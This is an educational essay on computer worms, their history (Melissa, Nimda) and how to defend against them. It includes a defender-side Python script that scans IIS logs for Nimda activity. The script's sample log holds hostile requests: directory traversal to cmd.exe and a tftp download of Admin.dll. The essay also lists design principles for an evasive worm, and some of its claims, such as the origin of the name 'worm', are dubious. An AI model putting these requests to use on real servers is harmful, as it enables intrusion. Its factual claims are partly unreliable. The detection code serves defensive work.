Worm Viruses

The increasing popularity of worm viruses is making computing a dangerous venture for those who know little about computer security.  Computer security is fast becoming a necessity to learn in today’s computing era.  With the invention of the worm, every computer that is linked to another is vulnerable without the appropriate measures in place, or at least the appropriate education.  In order to understand the security problems we first have to look at what a worm virus is, how a worm virus operates, who develops these viruses, what some of the well-known worm viruses are and the vulnerabilities they pose, and finally what a user can do to prevent, detect, and exterminate these vulnerabilities from their system.

A worm is a type of computer virus, defined as malicious software intended to do damage.  Worms are malicious code segments that replicate and send themselves to other systems in order to infect them as well.  A worm is a program that moves through a system altering the language or bits of data.  The worm received its name because of the tracks of zeros it leaves while moving through the system; these tracks resemble the tracks a worm leaves in the sand when it moves from one place to another.  A worm, however, will not infect multiple applications.  When it enters a system it has one specific mission to carry out.  Once that mission has been carried out, it conducts its secondary mission, which is to execute the code that forwards itself on to another victim, either through e-mail or through a network of some sort.  One key characteristic of a worm is the ability to spread through a network from one system to another without human intervention.

Worms, unlike viruses, do not infect programs; they infect other computers.  The worm’s major motivation is to congest and shut down a network.  Worms take advantage of features in network connections and exploit automated functions within a network.  Worms try to execute and spread as fast and as far as possible so that their business is done before they are detected; that way the damage is already done.

The host worm and the network worm are two types of worms.  They differ in where their code or executable program is located.  Host worms are based in an infected computer and use a network connection to transfer themselves.  A network worm does not rely on a host machine; it uses network connections to spread and run its various code.

Unlike human viruses, computer viruses are not airborne diseases.  Computer viruses like the worm have to have some sort of direct link to other computers.  These viruses can be transmitted by e-mail, modem, Local Area Network (LAN), the Internet, or simply by taking a floppy disk from an infected computer to one that is not infected.  In simple terms, there needs to be some sort of direct link to the system in order for infection to take place.  If a user were never to connect their computer to any other computer by any means and did not transmit data back and forth on floppy disks, then it is safe to say that computer’s only way of contracting a virus would be through a Trojan horse in software purchased at a retailer for installation on a stand-alone computer.  A worm virus would not exist on the computer.  If, for instance, a worm were packaged as a Trojan horse it would be able to do its business on the stand-alone computer, but it would not be able to fulfill its entire mission as a worm, which is to send itself on to damage other computers, because no connection to other computers would exist.  A simile would be pregnancy: the only sure-fire way to avoid getting pregnant is to practice celibacy.  The same holds true in the computer industry.  However, maintaining celibacy carries a cost as well.  In today’s technology-driven society, connectivity to the Internet is becoming a must to survive.  While this theory of celibacy may hold true for the home user with no interest in the outside world, the same would not work for industry.  To survive in today’s market a business needs to stay with the times, and that direction is computing.

The existence of worm programs goes back a few years.  In the early 1980s Shoch and Hupp did some early experiments with worm programs on idle hosts on an early Ethernet LAN.  This worm would occasionally get out of hand and have to be exterminated, which turned out to be a difficult task because the worm program had the ability to jump back and forth from host to host.  Another early worm is Christma.exec, which surfaced in December 1987.  This worm was one of the first introduced as an e-mail worm; it required the user to actually execute the e-mail.  It was written in REXX.  As a result IBM had to write one of the first mail scanner programs in order to eradicate the worm.  One of the most renowned worms out there today is Melissa, which surfaced in March 1999.  It had two methods of spreading itself: it would spread either by being opened in Word as a macro virus or as an Outlook-enabled worm.  The Outlook-enabled worm is what made Melissa famous and gained it the media attention it got.  The worm component of Melissa was how it interacted with the Outlook Address Book and sent itself to the first 50 people in the personal address book.  This was a one-time payload.  Melissa gained its notoriety because it was the most widespread virus of its time in March 1999.  It is often said that Melissa infected approximately one million computers and caused between ninety-three million dollars and three hundred eighty-five million dollars in damages.  This damage assessment was with Melissa only being widespread for about a week.

There are several ways a worm can make its way through a LAN.  One way is through unprotected shares.  Unprotected shares are files that are shared out without requiring a password or some other form of authentication to gain access.  These are probably the most vulnerable files on a computer; they require very little effort on the part of the worm to gain access.  Another way a worm can make its way through a network is into protected network shares.  These are files that are shared out but also require some form of authentication, such as a password, in order to gain access.  Some worms are intelligent enough that they contain executables that use password-guessing techniques to try to break the password and gain access.  Once the worm is inside it can infect the files.  Because the user knows these files are password-protected, detection may not happen, since the user isn’t expecting this area to be infiltrated.  Already-connected share drives are another highway the worm uses to pass itself through the network.  These are drives within the network that are automatically connected when the system boots up; the connections are written into the boot-up directory.  As a result these drives remain active the entire time the computer is logged on.  The worm then makes its way to other computers through this connection as each computer logs on.  A last and most common way of migrating the worm from computer to computer within a network is corporate e-mail.  This is the most widely used method, and it allows the worm to infect multiple users at the same time and spread itself to more computers within a small amount of time.

Another popular worm that gained a vast amount of media attention in September 2001 is the Nimda worm.  This worm utilized multiple methods to spread itself to other computers: it used e-mail, it searched for open network shares, it attempted to copy itself to unpatched or already vulnerable Microsoft web servers, and it contained a virus that infected local files and remote network files.  Nimda used the Unicode Web Traversal exploit.  When Nimda arrives by e-mail it uses a MIME exploit to allow the virus to execute; this happens just by reading or previewing the file.  If you visit a compromised Web server you could be prompted to download an .eml file, which is an Outlook Express file.  This file contains the Nimda worm as an attachment.  To avoid this you can disable “File Download” in the security zones of Internet Explorer.  This should prevent a compromise.  The Nimda worm will also create holes in your system once it is on the system.  These holes take the form of system shares: Nimda creates open system shares on your computer, allowing access to your system.  It also gives the Guest account on your computer administrator privileges.  This could lead to a serious security issue because it enables anyone logging in to your computer to have full access to anything contained on that system.  Using the Nimda worm as a delivery source, an attacker is able to compromise a vulnerable IIS server remotely.  The attacker is then able to create an account on the targeted server with administrator privileges regardless of the drive it is installed on.  The worm then uses directory traversal techniques to access cmd.exe on unpatched IIS servers.  The worm also attempts to use IIS servers that have previously been infected by Code Red II to access root.exe in the inetpub/scripts directory.  The worm then searches for Web servers using randomly generated IP addresses.
Using the Unicode Web Traversal exploit, Nimda copies itself to the Web server as an admin.dll file via TFTP.  Infected machines then run a listening TFTP server (port 69/UDP) to transfer the worm.  This file is then copied to multiple locations.  It then attempts to modify files named default, index, main or readme, or files with extensions such as .htm, .html, or .asp, by adding JavaScript.  This JavaScript is presented to every visitor who views the page.  Once the user views an infected page they are presented with a readme.eml file, which was created by Nimda.  This file is an Outlook Express e-mail file with the worm as an attachment.  The message utilizes the MIME exploit.  As a result one can see that simply browsing the Internet can infect a computer.
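As an added defender-side example (not part of the original essay), the following Python script turns the Nimda indicators described above into detection logic over constructed sample data: it flags IIS log entries showing double-encoded or Unicode directory traversal toward cmd.exe, Code Red II root.exe probes, and TFTP fetches of admin.dll, and it checks a web page for the injected JavaScript that opens readme.eml.  The log lines, IP addresses and page fragment are constructed for illustration and are not captured from a real incident.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS log lines (client-ip method uri-stem status); addresses are from
# documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 GET /scripts/root.exe?/c+dir 404
192.0.2.10 GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 200
192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll 200
198.51.100.7 GET /index.html 200
"""

# Constructed page fragment resembling the JavaScript Nimda appended to web pages.
INJECTED_PAGE = ('<html><body>Welcome</body></html><html><script language="JavaScript">'
                 'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
                 '</script></html>')

def fully_decode(uri):
    """Undo repeated percent-encoding (%255c -> %5c -> backslash) and normalise separators."""
    prev = None
    while prev != uri:
        prev, uri = uri, unquote(uri)
    return uri.replace("\\", "/")

def classify(uri):
    """Return the reasons a request matches the Nimda behaviour described above."""
    raw, decoded = uri.lower(), fully_decode(uri).lower()
    checks = [
        ("/.." in decoded or "%c1%1c" in raw, "directory traversal"),
        ("cmd.exe" in decoded, "cmd.exe execution attempt"),
        ("root.exe" in decoded, "Code Red II backdoor probe"),
        (re.search(r"tftp\b.*admin\.dll", decoded) is not None, "tftp fetch of admin.dll"),
    ]
    return [label for hit, label in checks if hit]

def scan_log(log_text):
    """Return (client_ip, uri, reasons) for every request that looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        reasons = classify(parts[2]) if len(parts) >= 3 else []
        if reasons:
            hits.append((parts[0], parts[2], reasons))
    return hits

def has_eml_injection(html):
    """True if a script block opens a .eml file: the readme.eml delivery trick."""
    pattern = r"<script[^>]*>[^<]*window\.open\(\s*['\"][^'\"]*\.eml['\"]"
    return re.search(pattern, html, re.IGNORECASE) is not None
```

Decoding the URI repeatedly before matching matters because the double-encoded form (%255c) passes a naive single-decode filter; the page check would be run over the default, index, main and readme files the worm modifies.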

In order to be effective a worm should embody seven simple principles: portability, invisibility, independence, learning, integrity, polymorphism, and usability.  To meet the portability aspect the worm must be able to operate and conduct its business on multiple operating system platforms.  Invisibility exists when the worm is able to operate in a stealth or masquerading mode; it must be able to hide and avoid detection.  To have independence the worm must be able to spread automatically without requiring user responses.  To meet the learning principle the worm should be able to learn new exploits and techniques instantly; it should be able to update its code using a worm net.  Integrity concerns the ability to be traced: worms should be single and their structure should be difficult to trace, modify, intrude or kill.  Polymorphism means the worm should be fully polymorphic, with no constant portion of specific code, to avoid detection.  For a worm to have good usability it should be able to complete its mission, infect its destination, download instructions and, once completed, disappear from all systems.

Worms are developed by people who write malicious logic as a hobby.  Some are looking for financial gain, infiltrating systems to gain information, or are simply hackers looking for fame or bragging rights.  Since these people do their business for one of these reasons, it usually results in some sort of media attention.  With ignorance of what worms are and what they do, people don’t know how to detect and react, resulting in the worm successfully completing its mission.

Now that we know what a worm is, what it can do and what types of worms are out there, the bigger question comes to mind: what can we as users or administrators do to protect our systems against the worm?  The only sure-fire way of 100% protection is to not have any connection to any computer in any way, shape or form.  That is not always a productive solution, because the whole purpose of information is to share it with those who have a valid need to know, and in today’s technology the best and most efficient way to do that is through computers and networks.  The next best solution is to devise a plan that includes awareness, protection, detection, a reaction plan and a plan to recover from the situation in the event there is a need.  One way to protect a system or network is to stay tuned to what threats and vulnerabilities exist.  Find out if there is a fix for that vulnerability and, if so, implement the fix before you are hit.  Knowing your systems, what threats exist, what vulnerabilities you have and what fixes are out there is the best protection plan.  Detection has to be a responsibility shared by all who use the information.  Checking the system and reporting any abnormalities to other users can help prevent the worm from spreading.  The users should know what the information should contain, and when there is an abnormal change in the information it should be promptly reported to the system administrator, who can carry out an inspection and, if necessary, begin the reaction phase.  The reaction phase consists of isolating the threat and extracting it from the system before further damage can be done.  The most important element of any reaction phase is notification.  By notification I mean it is important to let all users who utilize the same connections or share the same information know what threat exists, so that they may react, prevent and detect on their systems as well.

The key element of any Information Security plan is education.  If your users are not educated then you lose your grip on the program.  This theory may sound harsh, but it is the cold hard truth.  The users are the front line of defense.  Like the Marine Corps in a time of war, they are on the front line when the enemy is charging.  The user on a network system is the front line of defense for an information security program.  In the unfortunate event a worm is released on the Internet or a network, the user is going to be the first person to notice the infiltration.  That notice will come in the form of corrupt data, a slower than normal system, lost data, or, in the worst-case scenario, a system that completely crashes.  Users will be the ones who report the situation in a timely fashion to hopefully minimize the damage.  Worms travel from system to system, and the only way to stop them is first to stop their mode of travel from system to system.  Next they must be contained.  Thirdly they must be removed and exterminated.  Then and only then will you have rid yourself of the worm.  The worm's nature is to survive by infecting and moving on without being detected until it is too late.  There is software out there whose sole purpose is to manage this for you.  However, it only protects against things it is programmed to recognize.  New worms are developed each day, so relying on this software as your sole source of detection would not be a very wise Information Security Program.  The best program for fighting the worm is one that encompasses all of these elements.
